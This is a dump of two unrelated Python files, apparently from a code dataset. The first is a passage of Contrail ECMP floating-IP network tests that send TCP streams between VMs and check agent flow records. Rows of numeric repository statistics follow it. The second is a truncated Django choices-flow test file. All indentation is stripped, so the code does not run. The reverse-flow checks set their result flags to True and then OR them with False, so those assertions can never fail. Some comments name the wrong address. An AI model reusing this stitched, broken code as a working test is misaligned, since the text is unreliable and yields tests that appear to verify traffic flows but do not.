self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm3.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
dpi_list = [dpi1]
rev_flow_rec1 = {}
rev_flow_rec2 = {}
rev_flow_rec3 = {}
rev_flow_result1 = True
rev_flow_result2 = True
rev_flow_result3 = True
for dpi in dpi_list:
rev_flow_rec1[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='17')
rev_flow_rec2[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn2_vrf_id, sip=vm2.vm_ip, dip=fvn_vm2.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='17')
rev_flow_rec3[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn3_vrf_id, sip=vm3.vm_ip, dip=fvn_vm3.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='17')
if rev_flow_rec1[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result1 = rev_flow_result1 or False
if rev_flow_rec2[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm2.vm_ip, fvn_vm2.vm_ip, vm_node_ip))
rev_flow_result2 = rev_flow_result2 or False
if rev_flow_rec3[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm3.vm_ip, fvn_vm3.vm_ip, vm_node_ip))
rev_flow_result3 = rev_flow_result3 or False
assert flow_result, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm2.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert flow_result3, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm3.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert (
rev_flow_result3 or rev_flow_result1 or rev_flow_result2), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_three_vms_same_fip_incr_sip
@preposttest_wrapper
def test_ecmp_bw_three_vms_same_fip(self):
'''Test communication between three VMs who have borrowed the FIP from common FIP pool.
'''
result = True
self.fip_pool_name = self.res.fip_pool_name
fvn = self.res.fvn
vn1 = self.res.vn1
vn2 = self.res.vn2
vn3 = self.res.vn3
my_fip = self.res.my_fip
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = self.res.dport1
dport2 = self.res.dport2
dport3 = self.res.dport3
udp_src = self.res.udp_src
vm1 = self.res.vm1
vm2 = self.res.vm2
vm3 = self.res.vm3
fvn_vm1 = self.res.fvn_vm1
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
if (vm1.vm_node_ip != vm3.vm_node_ip):
vm_node_ips.append(vm3.vm_node_ip)
# Starting two flows of TCP Traffic from fvn_vm1 to 30.1.1.3
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic from fvn_vm1 to 30.1.1.3')
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2, vm3]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream3 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport3)
stream_list = [stream1, stream2, stream3]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
sleep(10)
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream' % (
stream_sent_count[stream], stream_recv_count[stream])
# Checking Flow Records
flow_result = False
flow_result2 = False
flow_result3 = False
rev_flow_result = False
rev_flow_result1 = False
rev_flow_result2 = False
vn1_vrf_id = vm1.get_vrf_id(
self.res.vn1_fq_name, self.res.vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(
self.res.vn2_fq_name, self.res.vn2_vrf_name)
vn3_vrf_id = vm3.get_vrf_id(
self.res.vn3_fq_name, self.res.vn3_vrf_name)
fvn_vrf_id = fvn_vm1.get_vrf_id(
self.res.fvn_fq_name, self.res.fvn_vrf_name)
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
flow_rec3 = None
dpi1 = unicode(self.res.dport1)
dpi2 = unicode(self.res.dport2)
dpi3 = unicode(self.res.dport3)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi1, protocol='6')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi2, protocol='6')
flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=self.res.my_fip, sport=self.res.udp_src, dport=dpi3, protocol='6')
if flow_rec1 is not None:
flow_result = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
flow_result2 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2, vm_node_ip))
if flow_rec3 is not None:
flow_result3 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3, vm_node_ip))
else:
flow_result3 = flow_result3 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3, vm_node_ip))
dpi_list = [dpi1, dpi2, dpi3]
rev_flow_rec1 = {}
rev_flow_rec2 = {}
rev_flow_rec3 = {}
rev_flow_result1 = True
rev_flow_result2 = True
rev_flow_result3 = True
for dpi in dpi_list:
rev_flow_rec1[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
rev_flow_rec2[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn2_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
rev_flow_rec3[dpi] = inspect_h100.get_vna_fetchflowrecord(
vrf=vn3_vrf_id, sip=vm3.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi, dport=self.res.udp_src, protocol='6')
if rev_flow_rec1[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result1 = rev_flow_result1 or False
if rev_flow_rec2[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result2 = rev_flow_result2 or False
if rev_flow_rec3[dpi]:
self.logger.info(
'Reverse Flow from %s to %s exists on Agent %s' %
(vm3.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_result3 = rev_flow_result3 or False
assert flow_result, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi2)
assert flow_result3, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, self.res.udp_src, self.res.my_fip, dpi3)
assert (
rev_flow_result3 or rev_flow_result1 or rev_flow_result2), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_three_vms_same_fip
@preposttest_wrapper
def test_ecmp_bw_two_vms_same_fip(self):
'''Test communication between the VMs who has borrowed the FIP from common FIP pool.
'''
result = True
fip_pool_name = 'some-pool'
#fvn_name= self.res.fip_vn_name
fvn = self.useFixture(VNFixture(project_name=self.inputs.project_name,
connections=self.connections, vn_name='fvn_1', inputs=self.inputs, subnets=['33.1.1.0/29']))
vn1 = self.useFixture(VNFixture(project_name=self.inputs.project_name,
connections=self.connections, vn_name='vn_1', inputs=self.inputs, subnets=['11.1.1.0/29']))
#vn2= self.useFixture( VNFixture(project_name= self.inputs.project_name, connections= self.connections,vn_name='vn2', inputs= self.inputs, subnets=['20.1.1.0/29']))
my_fip = '33.1.1.3'
agent_tap_intf_list = {}
tap_intf_list = []
a_list = []
dport1 = '9000'
dport2 = '9001'
udp_src = unicode(8000)
vm1 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn1.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='vn_1_vm_1'))
vm2 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=vn1.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='vn_1_vm_2'))
fvn_vm1 = self.useFixture(
VMFixture(
project_name=self.inputs.project_name, connections=self.connections,
vn_obj=fvn.obj, flavor='contrail_flavor_small', image_name='ubuntu-traffic', vm_name='fvn_1_vm1'))
assert fvn.verify_on_setup()
assert vn1.verify_on_setup()
assert vm1.verify_on_setup()
assert vm2.verify_on_setup()
assert fvn_vm1.verify_on_setup()
out1 = vm1.wait_till_vm_is_up()
if out1 == False:
return {'result': out1, 'msg': "%s failed to come up" % vm1.vm_name}
else:
self.logger.info('Installing Traffic package on %s ...' %
vm1.vm_name)
vm1.install_pkg("Traffic")
out2 = vm2.wait_till_vm_is_up()
if out2 == False:
return {'result': out2, 'msg': "%s failed to come up" % vm2.vm_name}
else:
sleep(
10)
self.logger.info('Installing Traffic package on %s ...' %
vm2.vm_name)
vm2.install_pkg("Traffic")
out3 = fvn_vm1.wait_till_vm_is_up()
if out3 == False:
return {'result': out3, 'msg': "%s failed to come up" % fvn_vm1.vm_name}
else:
sleep(
10)
self.logger.info('Installing Traffic package on %s ...' %
fvn_vm1.vm_name)
fvn_vm1.install_pkg("Traffic")
vn1_fq_name = vn1.vn_fq_name
fvn_fq_name = fvn.vn_fq_name
fvn_vrf_name = fvn.vrf_name
vn1_vrf_name = vn1.vrf_name
fvn_id = fvn.vn_id
vm1_id = vm1.vm_id
vm2_id = vm2.vm_id
fvn_ri_name = fvn.ri_name
vn1_ri_name = vn1.ri_name
(domain, project, fvn) = fvn_fq_name.split(':')
(domain, project, vn1) = vn1_fq_name.split(':')
vmi1_id = vm1.tap_intf[vn1_fq_name]['uuid']
vmi2_id = vm2.tap_intf[vn1_fq_name]['uuid']
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_id))
assert fip_fixture.verify_on_setup()
my_fip_name = 'fip'
fvn_obj = self.vnc_lib.virtual_network_read(id=fvn_id)
fip_pool_obj = FloatingIpPool(fip_pool_name, fvn_obj)
fip_obj = FloatingIp(my_fip_name, fip_pool_obj, my_fip, True)
# Get the project_fixture
self.project_fixture = self.useFixture(ProjectFixture(
project_name=self.inputs.project_name, connections=self.connections))
# Read the project obj and set to the floating ip object.
fip_obj.set_project(self.project_fixture.project_obj)
vm1_intf = self.vnc_lib.virtual_machine_interface_read(id=vmi1_id)
vm2_intf = self.vnc_lib.virtual_machine_interface_read(id=vmi2_id)
fip_obj.add_virtual_machine_interface(vm1_intf)
fip_obj.add_virtual_machine_interface(vm2_intf)
self.vnc_lib.floating_ip_create(fip_obj)
self.addCleanup(self.vnc_lib.floating_ip_delete, fip_obj.fq_name)
vm_node_ips = []
vm_node_ips.append(vm1.vm_node_ip)
if (vm1.vm_node_ip != vm2.vm_node_ip):
vm_node_ips.append(vm2.vm_node_ip)
# Get the Route Entry in the control node
for vm_node_ip in vm_node_ips:
active_controller = None
inspect_h1 = self.agent_inspect[vm_node_ip]
agent_xmpp_status = inspect_h1.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
active_controller = entry['controller_ip']
self.logger.info(
'Active control node from the Agent %s is %s' %
(vm_node_ip, active_controller))
sleep(5)
route_entry = self.cn_inspect[active_controller].get_cn_route_table_entry(
ri_name=fvn_ri_name, prefix='33.1.1.3/32')
result = True
self.logger.info('Route_entry in the control node is %s' % route_entry)
if route_entry:
self.logger.info(
'Route Entry found in the Active Control-Node %s' %
(active_controller))
else:
result = False
assert result, 'Route Entry not found in the Active Control-Node %s' % (
active_controller)
# Get the FIP list and verify the vrf_name and address in the VMI
fip_addr_vm1 = vm1.chk_vmi_for_fip(vn1_fq_name)
fip_addr_vm2 = vm2.chk_vmi_for_fip(vn1_fq_name)
fip_vrf_entry_vm1 = vm1.chk_vmi_for_vrf_entry(vn1_fq_name)
fip_vrf_entry_vm2 = vm2.chk_vmi_for_vrf_entry(vn1_fq_name)
self.logger.info(
'The vrf_entry on the VMI of %s is %s and on %s is %s' %
(vm1.vm_name, fip_vrf_entry_vm1, vm2.vm_name, fip_vrf_entry_vm2))
if ((fip_vrf_entry_vm1 == fvn_vrf_name) and (fip_vrf_entry_vm2 == fvn_vrf_name)):
self.logger.info('Correct FIP VRF Entries seen ')
else:
result = False
assert result, 'Incorrect FIP VRF Entries seen'
self.logger.info(
'The FIP address assigned to %s is %s and to %s is %s' %
(vm1.vm_name, fip_addr_vm1, vm2.vm_name, fip_addr_vm2))
if ((fip_addr_vm1 == my_fip) and (fip_addr_vm2 == my_fip)):
self.logger.info('FIP Address assigned correctly ')
else:
result = False
assert result, 'FIP Address assignment incorrect'
# Check for the FIP route entry
for vm_node_ip in vm_node_ips:
inspect_h2 = self.agent_inspect[vm_node_ip]
fvn_vrf_id1 = inspect_h2.get_vna_vrf_objs(
domain, project, fvn)['vrf_list'][0]['ucindex']
nh1 = inspect_h2.get_vna_active_route(
vrf_id=fvn_vrf_id1, ip=my_fip, prefix='32')
if not nh1:
result = False
assert result, 'Route not found in the Agent %s' % vm_node_ip
else:
self.logger.info('Route found in the Agent %s' % vm_node_ip)
# Check for the FIP route entry
for vm_node_ip in vm_node_ips:
tap_intf_list = []
inspect_h9 = self.agent_inspect[vm_node_ip]
agent_vrf_objs = inspect_h9.get_vna_vrf_objs(domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], fvn_vrf_name)
fvn_vrf_id9 = agent_vrf_obj['ucindex']
paths = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=my_fip, prefix='32')['path_list']
self.logger.info('There are %s nexthops to %s on Agent %s' %
(len(paths), my_fip, vm_node_ip))
next_hops = inspect_h9.get_vna_active_route(
vrf_id=fvn_vrf_id9, ip=my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
if not next_hops:
result = False
assert result, 'Route not found in the Agent %s' % vm_node_ip
else:
self.logger.info('Route found in the Agent %s' % vm_node_ip)
for nh in next_hops:
label = nh['label']
if nh['type'] == 'Tunnel':
destn_agent = nh['dip']
inspect_hh = self.agent_inspect[destn_agent]
agent_vrf_objs = inspect_hh.get_vna_vrf_objs(
domain, project, fvn)
agent_vrf_obj = self.get_matching_vrf(
agent_vrf_objs['vrf_list'], fvn_vrf_name)
fvn_vrf_id5 = agent_vrf_obj['ucindex']
next_hops_in_tnl = inspect_hh.get_vna_active_route(
vrf_id=fvn_vrf_id5, ip=my_fip, prefix='32')['path_list'][0]['nh']['mc_list']
for next_hop in next_hops_in_tnl:
if next_hop['type'] == 'Interface':
tap_intf_from_tnl = next_hop['itf']
tap_intf_list.append(tap_intf_from_tnl)
elif nh['type'] == 'Interface':
tap_intf = nh['itf']
tap_intf_list.append(tap_intf)
agent_tap_intf_list[vm_node_ip] = tap_intf_list
self.logger.info('The list of Tap interfaces from the agents are %s' %
agent_tap_intf_list)
# a_list= agent_tap_intf_list.values()
# result= all(x == a_list[0] for x in a_list)
# if result == True:
# self.logger.info('The Tap interface list is the same across agents')
# else:
# assert result, 'The Tap interface list across agents is incorrect'
# Starting two flows of TCP Traffic from fvn_vm1 to 30.1.1.3
self.logger.info("-" * 80)
self.logger.info('Starting TCP Traffic from fvn_vm1 to 30.1.1.3')
self.logger.info("-" * 80)
vm_list = []
vm_list = [vm1, vm2]
profile = {}
sender = {}
receiver = {}
stream1 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport1)
stream2 = Stream(protocol="ip", proto="tcp", src=fvn_vm1.vm_ip,
dst=my_fip, sport=udp_src, dport=dport2)
stream_list = [stream1, stream2]
tx_vm_node_ip = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(fvn_vm1.vm_obj)]['host_ip']
tx_local_host = Host(
tx_vm_node_ip,
self.inputs.host_data[tx_vm_node_ip]['username'],
self.inputs.host_data[tx_vm_node_ip]['password'])
send_host = Host(fvn_vm1.local_ip, fvn_vm1.vm_username,
fvn_vm1.vm_password)
rx_vm_node_ip = {}
rx_local_host = {}
recv_host = {}
for vm in vm_list:
rx_vm_node_ip[vm] = self.inputs.host_data[
self.nova_h.get_nova_host_of_vm(vm.vm_obj)]['host_ip']
rx_local_host[vm] = Host(
rx_vm_node_ip[vm],
self.inputs.host_data[vm.vm_node_ip]['username'],
self.inputs.host_data[vm.vm_node_ip]['password'])
recv_host[vm] = Host(vm.local_ip, vm.vm_username, vm.vm_password)
count = 0
for stream in stream_list:
profile[stream] = {}
sender[stream] = {}
receiver[stream] = {}
for vm in vm_list:
count = count + 1
send_filename = 'sendtcp_%s' % count
recv_filename = 'recvtcp_%s' % count
profile[stream][vm] = ContinuousProfile(
stream=stream, listener=vm.vm_ip, chksum=True)
sender[stream][vm] = Sender(
send_filename, profile[stream][vm], tx_local_host, send_host, self.inputs.logger)
receiver[stream][vm] = Receiver(
recv_filename, profile[stream][vm], rx_local_host[vm], recv_host[vm], self.inputs.logger)
receiver[stream][vm].start()
sender[stream][vm].start()
self.logger.info('Sending traffic for 10 seconds')
sleep(10)
for stream in stream_list:
for vm in vm_list:
sender[stream][vm].stop()
for stream in stream_list:
for vm in vm_list:
receiver[stream][vm].stop()
stream_sent_count = {}
stream_recv_count = {}
result = True
for stream in stream_list:
stream_sent_count[stream] = 0
stream_recv_count[stream] = 0
for vm in vm_list:
stream_sent_count[stream] = stream_sent_count[stream] + \
sender[stream][vm].sent
stream_recv_count[stream] = stream_recv_count[stream] + \
receiver[stream][vm].recv
if abs(stream_recv_count[stream] - stream_sent_count[stream]) < 5:
self.logger.info(
'%s packets sent and %s packets received in Stream' %
(stream_sent_count[stream], stream_recv_count[stream]))
else:
result = False
assert result, '%s packets sent and %s packets received in Stream' % (
stream_sent_count[stream], stream_recv_count[stream])
# Checking Flow Records
flow_result = False
flow_result2 = False
rev_flow_result = False
rev_flow_result1 = False
vn1_vrf_id = vm1.get_vrf_id(vn1_fq_name, vn1_vrf_name)
vn2_vrf_id = vm2.get_vrf_id(vn1_fq_name, vn1_vrf_name)
fvn_vrf_id = fvn_vm1.get_vrf_id(fvn_fq_name, fvn_vrf_name)
for vm_node_ip in vm_node_ips:
inspect_h100 = self.agent_inspect[vm_node_ip]
flow_rec1 = None
flow_rec2 = None
dpi1 = unicode(dport1)
dpi2 = unicode(dport2)
flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=my_fip, sport=udp_src, dport=dpi1, protocol='6')
flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=fvn_vrf_id, sip=fvn_vm1.vm_ip, dip=my_fip, sport=udp_src, dport=dpi2, protocol='6')
if flow_rec1 is not None:
assert not flow_result, 'Duplicate Flow detected'
flow_result = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, udp_src, my_fip, dpi1, vm_node_ip))
else:
flow_result = flow_result or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, udp_src, my_fip, dpi1, vm_node_ip))
if flow_rec2 is not None:
assert not flow_result2, 'Duplicate Flow detected'
flow_result2 = True
self.logger.info(
'Flow from %s:%s to %s:%s exists on Agent %s' %
(fvn_vm1.vm_ip, udp_src, my_fip, dpi2, vm_node_ip))
else:
flow_result2 = flow_result2 or False
self.logger.info('No Flow from %s:%s to %s:%s on Agent %s' %
(fvn_vm1.vm_ip, udp_src, my_fip, dpi2, vm_node_ip))
rev_flow_rec1 = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi1, dport=udp_src, protocol='6')
rev_flow_rec2 = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm1.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi2, dport=udp_src, protocol='6')
if (rev_flow_rec1 or rev_flow_rec2):
assert not rev_flow_result, 'Duplicate Reverse Flow detected'
rev_flow_result = True
self.logger.info(
'Reverse flow records between %s and %s seen properly on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
else:
rev_flow_result = rev_flow_result or False
self.logger.info(
'Reverse flow records between %s and %s not seen on Agent %s' %
(vm1.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
rev_flow_rec3 = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi1, dport=udp_src, protocol='6')
rev_flow_rec4 = inspect_h100.get_vna_fetchflowrecord(
vrf=vn1_vrf_id, sip=vm2.vm_ip, dip=fvn_vm1.vm_ip, sport=dpi2, dport=udp_src, protocol='6')
if (rev_flow_rec3 or rev_flow_rec4):
assert not rev_flow_result1, 'Duplicate Reverse Flow detected'
rev_flow_result1 = True
self.logger.info(
'Reverse flow records between %s and %s seen properly on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
else:
rev_flow_result1 = rev_flow_result1 or False
self.logger.info(
'Reverse flow records between %s and %s not seen on Agent %s' %
(vm2.vm_ip, fvn_vm1.vm_ip, vm_node_ip))
assert flow_result, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, udp_src, my_fip, dpi1)
assert flow_result2, 'Records for the flow between %s:%s and %s:%s not seen on any of the agents' % (
fvn_vm1.vm_ip, udp_src, my_fip, dpi2)
assert (
rev_flow_result or rev_flow_result1), 'Records for the reverse flow not seen on any of the agents'
return True
# end test_ecmp_bw_two_vms_same_fip
def get_matching_vrf(self, vrf_objs, vrf_name):
return [x for x in vrf_objs if x['name'] == vrf_name][0]
def remove_from_cleanups(self, fix):
for cleanup in self._cleanups:
# if fix.cleanUp in cleanup:
self._cleanups.remove(cleanup)
# break
# end remove_from_cleanups
# end TestECMP
| 46.094715
| 213
| 0.57903
| 12,252
| 88,087
| 3.869736
| 0.032974
| 0.045031
| 0.031722
| 0.02067
| 0.916435
| 0.903295
| 0.891694
| 0.884734
| 0.874884
| 0.865034
| 0
| 0.026127
| 0.323044
| 88,087
| 1,910
| 214
| 46.118848
| 0.768962
| 0.025225
| 0
| 0.835839
| 0
| 0.013229
| 0.111934
| 0.001236
| 0
| 0
| 0
| 0
| 0.030667
| 0
| null | null | 0.017438
| 0.015033
| null | null | 0.001203
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
29604032826c5774ff954971c59fa8a76eb8af88
| 3,452
|
py
|
Python
|
tests/test_choices.py
|
valdergallo/django-choices-flow
|
65ae1f483937dab40b5d5b3bd8d9f554d714cbbc
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2017-02-05T14:03:44.000Z
|
2017-02-05T15:23:21.000Z
|
tests/test_choices.py
|
valdergallo/django-choices-flow
|
65ae1f483937dab40b5d5b3bd8d9f554d714cbbc
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2015-10-15T14:40:49.000Z
|
2016-10-13T12:36:49.000Z
|
tests/test_choices.py
|
valdergallo/django-choices-flow
|
65ae1f483937dab40b5d5b3bd8d9f554d714cbbc
|
[
"BSD-2-Clause-FreeBSD"
] | 4
|
2017-07-27T13:35:16.000Z
|
2022-03-12T13:44:28.000Z
|
# -*- coding: utf-8 -*-
from django.test import TestCase
from django_choices_flow import Choices
class MyChoices(Choices):
NEW = (1, 'New content') # 'New content' is the display text
WAIT = (2, 'Wait')
CANCELED = (-1, 'Canceled')
ERROR = (-2, 'Error')
INVOICED = (3, 'Invoiced')
INVOICED_VALIDATION_NAME = (4, 'Invoiced Validation Name')
# set transaction rules
NEW_RULES = [WAIT, INVOICED, CANCELED, ERROR]
WAIT_RULES = [CANCELED, ERROR, INVOICED]
INVOICED_RULES = [CANCELED]
class TestChoices(TestCase):
def setUp(self):
self.choices = MyChoices
def test_key_value(self):
self.assertEqual(self.choices.NEW, 1)
self.assertEqual(self.choices.WAIT, 2)
self.assertEqual(self.choices.CANCELED, -1)
self.assertEqual(self.choices.ERROR, -2)
self.assertEqual(self.choices.INVOICED, 3)
def test_len_choices(self):
self.assertEqual(len(self.choices), 6)
def test_iter_list(self):
self.assertEquals(sorted(list(self.choices)),
sorted([(-1, 'Canceled'), (-2, 'Error'), (3, 'Invoiced'),
(1, 'New content'), (2, 'Wait'), (4, 'Invoiced Validation Name')]), self.choices)
def test_repr_choice(self):
self.assertEqual(str(sorted(self.choices)),
str(sorted([(-1, 'Canceled'), (-2, 'Error'), (3, 'Invoiced'),
(1, 'New content'), (2, 'Wait'), (4, 'Invoiced Validation Name')])), self.choices)
def test_get_value(self):
self.assertEqual(self.choices.get_value(1), 'New content')
def test_rules_transaction_return_ok(self):
self.assertEqual(self.choices.validate(self.choices.NEW, self.choices.WAIT), 2)
def test_rules_transaction_return_false(self):
self.assertEqual(self.choices.validate(self.choices.INVOICED, self.choices.WAIT), False)
class MyChoicesSingle(Choices):
NEW = 1
WAIT = 2
CANCELED = -1
ERROR = -2
INVOICED = 3
# set transaction rules
NEW_RULES = [WAIT, INVOICED, CANCELED, ERROR]
WAIT_RULES = [CANCELED, ERROR, INVOICED]
INVOICED_RULES = [CANCELED]
class TestChoicesSingle(TestCase):
def setUp(self):
self.choices = MyChoicesSingle
def test_key_value(self):
self.assertEqual(self.choices.NEW, 1)
self.assertEqual(self.choices.WAIT, 2)
self.assertEqual(self.choices.CANCELED, -1)
self.assertEqual(self.choices.ERROR, -2)
self.assertEqual(self.choices.INVOICED, 3)
def test_len_choices(self):
